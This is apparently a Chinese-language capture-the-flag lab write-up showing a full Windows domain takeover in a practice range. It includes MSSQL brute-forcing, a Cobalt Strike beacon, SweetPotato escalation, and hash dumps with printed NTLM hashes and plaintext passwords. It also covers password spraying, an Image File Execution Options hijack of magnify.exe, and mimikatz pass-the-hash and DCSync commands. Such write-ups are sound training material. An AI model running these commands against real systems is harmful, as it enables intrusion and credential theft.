目标IP:39.98.73.212
网络拓扑
![](https://img-blog.csdnimg.cn/img_convert/ae561da2a2e5f9462ab45750f5e44368.png)
入口机器
1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务)
![](https://img-blog.csdnimg.cn/img_convert/96f1b0e6315011a8b02e4a13baeb6044.png)
2、可以先爆破MSSQL服务,如下可以看出成爆破出密码
![](https://img-blog.csdnimg.cn/img_convert/093712ac14d21299f0819fdce5445778.png)
3、使用MDUT工具连接Mssql
![](https://img-blog.csdnimg.cn/img_convert/ad2a72c5a939f61d09d7f7080fe5d287.png)
4、使用xp_cmdshell执行命令发现只有一个比较地低的权限
![](https://img-blog.csdnimg.cn/img_convert/c4b3318720489bb46c4bf6d952ea9bc7.png)
5、使用CS生成木马,利用MDUT上传木马
![](https://img-blog.csdnimg.cn/img_convert/b0001ebbfff2b608301f0638bcb55047.png)
6、执行木马上线CS
C:/Users/Public/beacon.exe
![](https://img-blog.csdnimg.cn/img_convert/fed9e352c5ed9267436e64f18f0c535c.png)
![](https://img-blog.csdnimg.cn/img_convert/bfa368ba56aaa77631252b35bea81bf3.png)
7、使用土豆提权,提升至管理员权限
shell c:\\users\\public\\sweetpotato.exe -a whoami
![](https://img-blog.csdnimg.cn/img_convert/85306c5d0dd4035c540c6ae81bc2aa0e.png)
shell c:\\users\\public\\sweetpotato.exe -a "c:\\users\\public\\beacon.exe"
![](https://img-blog.csdnimg.cn/img_convert/6f8e65cfb1f0b35aaa863e118a2c1e84.png)
获取第一个flag
shell type C:\Users\Administrator\flag\flag01.txt
![](https://img-blog.csdnimg.cn/img_convert/e6fba88bceff35acfcb7a8ba39b0997a.png)
信息收集
1、查看机器内用户
shell net user
![](https://img-blog.csdnimg.cn/img_convert/69a9cb1da0b32463bc21073ada1df002.png)
hashdump
![](https://img-blog.csdnimg.cn/img_convert/1fecbb9027431f4ef93417c8c1f5da89.png)
hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82549 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::
查看在线用户
shell quser || qwinst
![](https://img-blog.csdnimg.cn/img_convert/d56d1b4aa13ecf7c08b3083ca96c5a46.png)
使用进行注入,上线Jhon用户
![](https://img-blog.csdnimg.cn/img_convert/f38aeaad98de1827181df11c0c1f3705.png)
成功上线
![](https://img-blog.csdnimg.cn/img_convert/316d02d3ef71503d85a960c60c78bb4d.png)
Shell net use
发现john用户的共享
![](https://img-blog.csdnimg.cn/img_convert/4d088dbc5b68ec7c466f23231c0a7a8d.png)
shell type \\tsclient\c\credential.txt
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
![](https://img-blog.csdnimg.cn/img_convert/30bfb1c84d6c50e69218e47ba8151d22.png)
上传fscan到入口机器进行内网信息收集
shell C:\Users\Public\fscan.exe -h 172.22.8.0/24
shell C:\Users\Public\fscan.exe -h 172.22.8.0/24
[*] Tasked beacon to run: C:\Users\Public\fscan.exe -h 172.22.8.0/24
[*] Hello,Dog cs.
[+] host called home, sent: 73 bytes
[+] received output:
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.6.3
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '172.22.8.31' is alive
(icmp) Target '172.22.8.15' is alive
(icmp) Target '172.22.8.18' is alive
(icmp) Target '172.22.8.46' is alive
icmp alive hosts len is: 4
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.18:445 open
172.22.8.15:445 open
172.22.8.31:445 open
172.22.8.46:135 open
172.22.8.46:139 open
172.22.8.18:139 open
172.22.8.15:139 open
172.22.8.31:139 open
172.22.8.18:135 open
172.22.8.15:135 open
172.22.8.31:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
alive ports len is: 16
start vulscan
[*] 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] 172.22.8.15 [+]DC XIAORANG\DC01
[*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows Server
NetInfo:
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:3c9d:2e4a:d89d:b62b
NetInfo:
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
NetInfo:
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
NetInfo:
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] 172.22.8.46 XIAORANG\WIN2016 Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ
[+] received output:
![](https://img-blog.csdnimg.cn/img_convert/fcd18506d0895898f282262800826c39.png)
内网渗透
1、使用CS搭建socks4代理
![](https://img-blog.csdnimg.cn/img_convert/0d137131e176f878347feedd38e1c55e.png)
2、修改proxychains 配置文件
socks4 120.78.239.191 1080
![](https://img-blog.csdnimg.cn/img_convert/983dc16247d8c877cacc5c09440668bc.png)
3、使用crackmapexec进行密码喷洒
proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
![](https://img-blog.csdnimg.cn/img_convert/df66d63902f7fc043180dda4c71f1130.png)
4、从上图可以发现提示说密码过期,使用 smbpasswd进行修改密码
proxychains -q python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Whoami@666'
![](https://img-blog.csdnimg.cn/img_convert/6ce608f0afcd94c8c1a14e0f2230b8e2.png)
5、修改密码后,经过测试发现只能登录172.22.8.46这台机器
Aldrich@xiaorang.lab
Whoami@666
6、远程登录之后我们发现这台主机不出网
![](https://img-blog.csdnimg.cn/img_convert/46992d9041034e000ecfaa2571d9dc4e.png)
利用172.22.8.18转发上线CobaltStrike
![](https://img-blog.csdnimg.cn/img_convert/79ce28c0796d1861ae2bc0fb599dcca7.png)
![](https://img-blog.csdnimg.cn/img_convert/e9016ecb64d7378c46a68d3c306233d5.png)
根据之前的提示映像劫持提权
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
发现NT AUTHORITY\Authenticated Users可以修改注册表
即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权
![](https://img-blog.csdnimg.cn/img_convert/74df8d5f98a5635c19b9a2a6809dba26.png)
修改注册表映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
![](https://img-blog.csdnimg.cn/img_convert/f4d9f09bdba6fe7d929e976626dd293f.png)
然后我们锁定这台电脑,在右下角点击放大镜,即可弹出这个管理员的命令行窗口
![](https://img-blog.csdnimg.cn/img_convert/e4bcc47cc06a30c27cc3fa8f637557c1.png)
然后我们运行cs木马,上线cs
![](https://img-blog.csdnimg.cn/img_convert/11f9b0817cbab69f509ed6fcd54f153d.png)
![](https://img-blog.csdnimg.cn/img_convert/8fff7495e19eacdab013e41ed415eecf.png)
获取flag
shell type C:\Users\Administrator\flag\flag02.txt
![](https://img-blog.csdnimg.cn/img_convert/10e1791695b0cb033e3dfdeadaefa598.png)
拿下域控
域用户信息收集
logonpasswords
![](https://img-blog.csdnimg.cn/img_convert/0ffe1edcd74314cea74b4a08eb237d95.png)
shell net user /domain
![](https://img-blog.csdnimg.cn/img_convert/2a66c64c12b7ae23f77f6d9c4871319b.png)
域管用户信息收集
shell net group "domain admins" /domain
发现win2016$在域管组里,即机器账户可以Hash传递登录域控。
![](https://img-blog.csdnimg.cn/img_convert/2270dffa4890db1f8e14b1508747c603.png)
利用mimikatz注入机器账户的hash
shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b47c845655f06fb51ede6767aabbb33f" "exit"
![](https://img-blog.csdnimg.cn/img_convert/cafda25aea8b863f30d4d963772cf934.png)
利用mimikatz dcsync dump域控hash
shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" "exit"
![](https://img-blog.csdnimg.cn/img_convert/ac161a5a41ae8ed0bf51e247d300e016.png)
利用mimikatz dcsync dump域控hash
shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
![](https://img-blog.csdnimg.cn/img_convert/2ae3ab98f753a7908eb779a4aa55e09c.png)
使用HASH传递登录域控,拿到第三个flag
Hash传递登录域控
proxychains python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15
![](https://img-blog.csdnimg.cn/img_convert/a25180ed193d15366d34500aa9919332.png)